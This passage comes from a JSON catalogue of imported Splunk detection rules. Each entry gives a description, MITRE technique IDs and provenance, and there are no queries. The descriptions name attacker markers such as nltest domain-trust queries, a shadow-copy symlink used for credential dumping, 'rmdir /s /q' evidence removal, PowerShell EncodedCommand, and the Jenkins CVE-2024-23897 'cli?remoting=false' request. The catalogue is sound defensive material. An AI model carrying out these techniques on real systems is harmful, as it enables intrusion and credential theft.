If confirmed malicious, this could enable attackers to execute API calls, access sensitive data, and perform administrative actions within the Okta environment.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.application" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1078.001" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/okta-new-api-token-created.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "c3d22720-35d3-4da4-bd0a-740d37192bd4", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/application/okta_new_api_token_created.yml" } }, { "id": "splunk-security-content-c3e05466-5f22-11eb-ae93-0242ac130002", "type": "detection", "name": "NLTest Domain Trust Discovery", "description": "The following analytic identifies the execution of `nltest.exe` with command-line arguments `/domain_trusts` or `/all_trusts` to query Domain Trust information. It leverages data from Endpoint Detection and Response (EDR) agents, focusing on process execution logs and command-line arguments. This activity is significant as it indicates potential reconnaissance efforts by adversaries to understand domain trust relationships, which can inform their lateral movement strategies. 
If confirmed malicious, this activity could enable attackers to map out trusted domains, facilitating further compromise and pivoting within the network.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1482" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/nltest-domain-trust-discovery.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "c3e05466-5f22-11eb-ae93-0242ac130002", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/nltest_domain_trust_discovery.yml" } }, { "id": "splunk-security-content-c3f48aa9-878e-443f-8889-e42a11a9bea9", "type": "detection", "name": "Microsoft Intune Bulk Wipe", "description": "The following analytic detects a high volume of \"wipe ManagedDevice\" events from the Intune admin portal (5+ per hour by default).\nIt leverages Intune audit logs to identify when this action is triggered. 
This activity is significant because the \"wipe ManagedDevice\" action factory resets devices connected to your Microsoft Intune tenant.\nIf confirmed malicious, an attacker can abuse this action to perform a large-scale data wiping attack against your managed endpoints.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.cloud" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1561.001" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/microsoft-intune-bulk-wipe.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "c3f48aa9-878e-443f-8889-e42a11a9bea9", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/cloud/microsoft_intune_bulk_wipe.yml" } }, { "id": "splunk-security-content-c3f85976-94a5-11ec-9a58-acde48001122", "type": "detection", "name": "Windows Excessive Disabled Services Event", "description": "The following analytic identifies an excessive number of system events where services are modified from start to disabled. It leverages Windows Event Logs (EventCode 7040) to detect multiple service state changes on a single host. This activity is significant as it may indicate an adversary attempting to disable security applications or other critical services, potentially leading to defense evasion or destructive actions. 
If confirmed malicious, this behavior could allow attackers to disable security defenses, disrupt system operations, and achieve their objectives on the compromised system.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1562.001" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/windows-excessive-disabled-services-event.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "c3f85976-94a5-11ec-9a58-acde48001122", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/windows_excessive_disabled_services_event.yml" } }, { "id": "splunk-security-content-c427bafb-0b2c-4b18-ad85-c03c6fed9e75", "type": "detection", "name": "Windows Modify Registry USeWuServer", "description": "The following analytic detects a suspicious modification to the Windows Update configuration registry key \"UseWUServer.\" It leverages data from the Endpoint.Registry data model to identify changes where the registry value is set to \"0x00000001.\" This activity is significant because it is commonly used by adversaries, including malware like RedLine Stealer, to bypass detection mechanisms and potentially exploit zero-day vulnerabilities. 
If confirmed malicious, this modification could allow attackers to evade defenses, persist on the target host, and deploy additional malicious payloads.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1112" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/windows-modify-registry-usewuserver.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "c427bafb-0b2c-4b18-ad85-c03c6fed9e75", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/windows_modify_registry_usewuserver.yml" } }, { "id": "splunk-security-content-c43f7b49-2dab-4e76-892e-7f971c2f20f1", "type": "detection", "name": "Cisco Secure Firewall - Blacklisted SSL Certificate Fingerprint", "description": "The following analytic detects the use of known suspicious SSL certificates in any observed event where the SSL_CertFingerprint field is present. It leverages Cisco Secure Firewall logs and compares the SSL certificate SHA1 fingerprint against a blacklist of certificates associated with malware distribution, command and control (C2) infrastructure, or phishing campaigns. This activity is significant as adversaries often reuse or self-sign certificates across malicious infrastructure, allowing defenders to track and detect encrypted sessions even when domains or IPs change. 
If confirmed malicious, this may indicate beaconing, malware download, or data exfiltration over TLS/SSL.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.network" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1587.002", "T1588.004", "T1071.001", "T1573.002" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/cisco-secure-firewall-blacklisted-ssl-certificate-fingerprint.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "c43f7b49-2dab-4e76-892e-7f971c2f20f1", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/network/cisco_secure_firewall___blacklisted_ssl_certificate_fingerprint.yml" } }, { "id": "splunk-security-content-c448488c-b7ec-11eb-8253-acde48001122", "type": "detection", "name": "Services Escalate Exe", "description": "The following analytic identifies the execution of a randomly named binary via `services.exe`, indicative of privilege escalation using Cobalt Strike's `svc-exe`. This detection leverages data from Endpoint Detection and Response (EDR) agents, focusing on process lineage and command-line executions. This activity is significant as it often follows initial access, allowing adversaries to escalate privileges and establish persistence. 
If confirmed malicious, this behavior could enable attackers to execute arbitrary code, maintain long-term access, and potentially move laterally within the network, posing a severe threat to the organization's security.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1548" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/services-escalate-exe.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "c448488c-b7ec-11eb-8253-acde48001122", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/services_escalate_exe.yml" } }, { "id": "splunk-security-content-c4566d2c-b094-48a1-9c59-d66e22065560", "type": "detection", "name": "Windows Indicator Removal Via Rmdir", "description": "The following analytic detects the execution of the 'rmdir' command with '/s' and '/q' options to delete files and directory trees. This detection leverages data from Endpoint Detection and Response (EDR) agents, focusing on command-line executions and process metadata. This activity is significant as it may indicate malware attempting to remove traces or components during cleanup operations. 
If confirmed malicious, this behavior could allow attackers to eliminate forensic evidence, hinder incident response efforts, and maintain persistence by removing indicators of compromise.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1070" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/windows-indicator-removal-via-rmdir.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "c4566d2c-b094-48a1-9c59-d66e22065560", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/windows_indicator_removal_via_rmdir.yml" } }, { "id": "splunk-security-content-c4824cc6-d644-458e-a39a-67cd67da75e3", "type": "detection", "name": "Cisco Duo Admin Login Unusual Os", "description": "The following analytic identifies Duo admin login attempts from operating systems that are unusual for your environment, excluding commonly used OS such as Mac OS X. Please adjust to your environment. It works by analyzing Duo activity logs for admin login actions and filtering out logins from expected operating systems. The analytic then aggregates events by browser, version, source IP, location, and OS details to highlight anomalies. Detecting admin logins from unexpected operating systems is critical for a SOC, as it may indicate credential compromise, unauthorized access, or attacker activity using unfamiliar devices. Such behavior can precede privilege escalation, policy changes, or other malicious actions within the Duo environment. 
Early detection enables rapid investigation and response, reducing the risk of account takeover and minimizing potential damage to organizational security controls.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.application" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1556" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/cisco-duo-admin-login-unusual-os.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "c4824cc6-d644-458e-a39a-67cd67da75e3", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/application/cisco_duo_admin_login_unusual_os.yml" } }, { "id": "splunk-security-content-c48a155b-2861-417a-813c-220f5272cf01", "type": "detection", "name": "ESXi Audit Tampering", "description": "This detection identifies the use of the esxcli system auditrecords commands, which can be used to tamper with logging on an ESXi host. 
This action may indicate an attempt to evade detection or hinder forensic analysis by preventing the recording of system-level audit events.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.application" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1562.003", "T1070" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/esxi-audit-tampering.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "c48a155b-2861-417a-813c-220f5272cf01", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/application/esxi_audit_tampering.yml" } }, { "id": "splunk-security-content-c4aeeeef-da7f-4338-b3ba-553cbcbe2138", "type": "detection", "name": "Windows AD Rogue Domain Controller Network Activity", "description": "The following analytic identifies unauthorized replication RPC calls from non-domain controller devices. It leverages Zeek wire data to detect specific RPC operations like DrsReplicaAdd and DRSGetNCChanges, filtering out legitimate domain controllers. This activity is significant as it may indicate an attempt to introduce a rogue domain controller, which can compromise the integrity of the Active Directory environment. 
If confirmed malicious, this could allow attackers to manipulate directory data, escalate privileges, and persist within the network, posing a severe security risk.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.network" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1207" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/windows-ad-rogue-domain-controller-network-activity.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "c4aeeeef-da7f-4338-b3ba-553cbcbe2138", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/network/windows_ad_rogue_domain_controller_network_activity.yml" } }, { "id": "splunk-security-content-c4db14d9-7909-48b4-a054-aa14d89dbb19", "type": "detection", "name": "Malicious PowerShell Process - Encoded Command", "description": "The following analytic detects the use of the EncodedCommand parameter in PowerShell processes.\nIt leverages Endpoint Detection and Response (EDR) data to identify variations of the EncodedCommand parameter, including shortened forms and different command switch types.\nThis activity can be significant because adversaries often use encoded commands to obfuscate malicious scripts, making detection harder.\nIf confirmed malicious, this behavior could allow attackers to execute hidden code, potentially leading to unauthorized access, privilege escalation, or persistent threats within the environment.\nReview parallel events to determine legitimacy and tune based on known administrative scripts.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": 
"medium", "category": "_quarantine", "mitre_techniques": [ "T1027" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/malicious-powershell-process-encoded-command.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "c4db14d9-7909-48b4-a054-aa14d89dbb19", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/malicious_powershell_process___encoded_command.yml" } }, { "id": "splunk-security-content-c53a8e62-f741-11ee-9f6e-acde48001122", "type": "detection", "name": "AWS Bedrock Invoke Model Access Denied", "description": "The following analytic identifies an access denied error when attempting to invoke AWS Bedrock models. It leverages AWS CloudTrail logs to detect when a user or service receives an AccessDenied error when calling the InvokeModel API. This activity is significant as it may indicate an adversary attempting to access Bedrock models with insufficient permissions after compromising credentials. 
If confirmed malicious, this could suggest reconnaissance activities or privilege escalation attempts targeting generative AI resources, potentially leading to data exfiltration or manipulation of model outputs.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.cloud" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1078", "T1550" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/aws-bedrock-invoke-model-access-denied.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "c53a8e62-f741-11ee-9f6e-acde48001122", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/cloud/aws_bedrock_invoke_model_access_denied.yml" } }, { "id": "splunk-security-content-c54b7439-cfb1-44c3-bb35-b0409553077c", "type": "detection", "name": "Windows Impair Defense Configure App Install Control", "description": "The following analytic detects modifications to the Windows registry that disable the Windows Defender SmartScreen App Install Control feature. It leverages data from the Endpoint.Registry data model to identify changes to specific registry values. This activity is significant because disabling App Install Control can allow users to install potentially malicious web-based applications without restrictions, increasing the risk of security vulnerabilities. 
If confirmed malicious, this action could lead to the installation of harmful applications, potentially compromising the system and exposing sensitive information.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1562.001" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/windows-impair-defense-configure-app-install-control.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "c54b7439-cfb1-44c3-bb35-b0409553077c", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/windows_impair_defense_configure_app_install_control.yml" } }, { "id": "splunk-security-content-c5a31f80-5888-4d81-9f78-1cc65026316e", "type": "detection", "name": "GetAdComputer with PowerShell", "description": "The following analytic detects the execution of `powershell.exe` with the `Get-AdComputer` commandlet, which is used to discover remote systems within a domain. This detection leverages data from Endpoint Detection and Response (EDR) agents, focusing on process names and command-line arguments. This activity is significant because it indicates potential reconnaissance efforts by adversaries to map out domain computers, which is a common step in the attack lifecycle. 
If confirmed malicious, this behavior could allow attackers to gain situational awareness and plan further attacks, potentially leading to unauthorized access and data exfiltration.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1018" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/getadcomputer-with-powershell.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "c5a31f80-5888-4d81-9f78-1cc65026316e", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/getadcomputer_with_powershell.yml" } }, { "id": "splunk-security-content-c5c622e4-d073-11ea-87d0-0242ac130003", "type": "detection", "name": "Detect Windows DNS SIGRed via Zeek", "description": "The following analytic detects the presence of SIGRed, a critical DNS vulnerability, using Zeek DNS and Zeek Conn data. It identifies specific DNS query types (SIG and KEY) and checks for high data transfer within a flow. This detection is significant because SIGRed allows attackers to execute remote code on Windows DNS servers, potentially leading to unauthorized access and control. If confirmed malicious, this activity could result in data exfiltration, service disruption, or further network compromise. 
Immediate investigation and mitigation, such as patching or isolating the affected server, are crucial.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.network" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1203" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/detect-windows-dns-sigred-via-zeek.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "c5c622e4-d073-11ea-87d0-0242ac130003", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/network/detect_windows_dns_sigred_via_zeek.yml" } }, { "id": "splunk-security-content-c5c8e0f3-147a-43da-bf04-4cfaec27dc44", "type": "detection", "name": "Windows Group Discovery Via Net", "description": "The following analytic identifies the execution of `net.exe` with command-line arguments used to query global, local and domain groups. It leverages data from Endpoint Detection and Response (EDR) agents, focusing on process names and command-line arguments. This activity is significant as it indicates potential reconnaissance efforts by adversaries to enumerate local or domain groups, which is a common step in Active Directory or privileged accounts discovery. 
If confirmed malicious, this behavior could allow attackers to gain insights into the domain structure, aiding in further attacks such as privilege escalation or lateral movement.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1069.001", "T1069.002" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/windows-group-discovery-via-net.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "c5c8e0f3-147a-43da-bf04-4cfaec27dc44", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/windows_group_discovery_via_net.yml" } }, { "id": "splunk-security-content-c5eac648-fae0-4263-91a6-773df1f4c903", "type": "detection", "name": "Credential Dumping via Symlink to Shadow Copy", "description": "The following analytic detects the creation of a symlink to a shadow copy, which may indicate credential dumping attempts. It leverages the Endpoint.Processes data model in Splunk to identify processes executing commands containing \"mklink\" and \"HarddiskVolumeShadowCopy\". This activity is significant because attackers often use this technique to manipulate or delete shadow copies, hindering system backup and recovery efforts. If confirmed malicious, this could prevent data restoration, complicate incident response, and lead to data loss or compromise. 
Analysts should review the process details, user, parent process, and any related artifacts to identify the attack source.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1003.003" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/credential-dumping-via-symlink-to-shadow-copy.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "c5eac648-fae0-4263-91a6-773df1f4c903", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/credential_dumping_via_symlink_to_shadow_copy.yml" } }, { "id": "splunk-security-content-c6149154-c9d8-11eb-9da7-acde48001122", "type": "detection", "name": "Windows Registry Modification for Safe Mode Persistence", "description": "The following analytic identifies modifications to the SafeBoot registry keys, specifically within the Minimal and Network paths. This detection leverages registry activity logs from endpoint data sources like Sysmon or EDR tools. Monitoring these keys is crucial as adversaries can use them to persist drivers or services in Safe Mode, with Network allowing network connections. 
If confirmed malicious, this activity could enable attackers to maintain persistence even in Safe Mode, potentially bypassing certain security measures and facilitating further malicious actions.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1547.001" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/windows-registry-modification-for-safe-mode-persistence.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "c6149154-c9d8-11eb-9da7-acde48001122", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/windows_registry_modification_for_safe_mode_persistence.yml" } }, { "id": "splunk-security-content-c641260d-2b48-4eb1-b1e8-2cc5b8b99ab1", "type": "detection", "name": "Jenkins Arbitrary File Read CVE-2024-23897", "description": "The following analytic identifies attempts to exploit Jenkins Arbitrary File Read CVE-2024-23897. It detects HTTP POST requests to Jenkins URLs containing \"*/cli?remoting=false*\" with a 200 status code. This activity is significant as it indicates potential unauthorized access to sensitive files on the Jenkins server, such as credentials and private keys. 
If confirmed malicious, this could lead to severe data breaches, unauthorized access, and further exploitation within the environment.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.application" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1190" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/jenkins-arbitrary-file-read-cve-2024-23897.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "c641260d-2b48-4eb1-b1e8-2cc5b8b99ab1", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/web/jenkins_arbitrary_file_read_cve_2024_23897.yml" } }, { "id": "splunk-security-content-c6998a30-fef4-4e89-97ac-3bb0123719b4", "type": "detection", "name": "O365 Email Access By Security Administrator", "description": "The following analytic identifies when a user with sufficient access to O365 Security & Compliance portal uses premium investigation features (Threat Explorer) to directly view email. 
Adversaries may exploit privileged access with this premium feature to enumerate or exfiltrate sensitive data.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.cloud" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1114.002", "T1567" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/o365-email-access-by-security-administrator.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "c6998a30-fef4-4e89-97ac-3bb0123719b4", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/cloud/o365_email_access_by_security_administrator.yml" } }, { "id": "splunk-security-content-c6b2d80f-179a-41a1-b95e-ce5601d7427a", "type": "detection", "name": "Windows Registry Payload Injection", "description": "The following analytic detects suspiciously long data written to the Windows registry, a behavior often linked to fileless malware or persistence techniques. It leverages Endpoint Detection and Response (EDR) telemetry, focusing on registry events with data lengths exceeding 512 characters. This activity is significant as it can indicate an attempt to evade traditional file-based defenses, making it crucial for SOC monitoring. 
If confirmed malicious, this technique could allow attackers to maintain persistence, execute code, or manipulate system configurations without leaving a conventional file footprint.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1027.011" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/windows-registry-payload-injection.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "c6b2d80f-179a-41a1-b95e-ce5601d7427a", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/windows_registry_payload_injection.yml" } }, { "id": "splunk-security-content-c6db35af-8a0e-4b61-88ed-738e66f15715", "type": "detection", "name": "Cisco NVM - Non-Network Binary Making Network Connection", "description": "This analytic detects network connections initiated by binaries that are not typically associated with network communication,\nsuch as 'notepad.exe', 'calc.exe' or 'write.exe'.\nIt leverages Cisco Network Visibility Module logs to correlate network flow activity with process context, including command-line arguments, process path, and parent process information.\nThese applications are normally used locally and do not require outbound network access. 
When they do initiate such connections, it may indicate process hollowing, code injection, or proxy execution, where adversaries abuse a trusted process to mask malicious activity.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1055", "T1036" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/cisco-nvm-non-network-binary-making-network-connection.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "c6db35af-8a0e-4b61-88ed-738e66f15715", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/cisco_nvm___non_network_binary_making_network_connection.yml" } }, { "id": "splunk-security-content-c6ddbf53-9715-49f3-bb4c-fb2e8a309cda", "type": "detection", "name": "Cloud Compute Instance Created With Previously Unseen Instance Type", "description": "The following analytic detects the creation of EC2 instances with previously unseen instance types.\nIt leverages Splunk's tstats command to analyze data from the Change data model, identifying instance types that have not been previously recorded.\nThis activity is significant for a SOC because it may indicate unauthorized or suspicious activity, such as an attacker attempting to create instances for malicious purposes.\nIf confirmed malicious, this could lead to unauthorized access, data exfiltration, system compromise, or service disruption. 
Immediate investigation is required to determine the legitimacy of the instance creation.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.cloud" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1578.002" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/cloud-compute-instance-created-with-previously-unseen-instance-type.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "c6ddbf53-9715-49f3-bb4c-fb2e8a309cda", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/cloud/cloud_compute_instance_created_with_previously_unseen_instance_type.yml" } }, { "id": "splunk-security-content-c6e24183-a5f4-4b2a-ad01-2eb456d09b67", "type": "detection", "name": "Windows AD Replication Service Traffic", "description": "The following analytic identifies unexpected Active Directory replication traffic from non-domain controller sources. It leverages data from the Network Traffic datamodel, specifically looking for applications related to AD replication. This activity is significant because AD replication traffic should typically only occur between domain controllers. Detection of such traffic from other sources may indicate malicious activities like DCSync or DCShadow, which are used for credential dumping. 
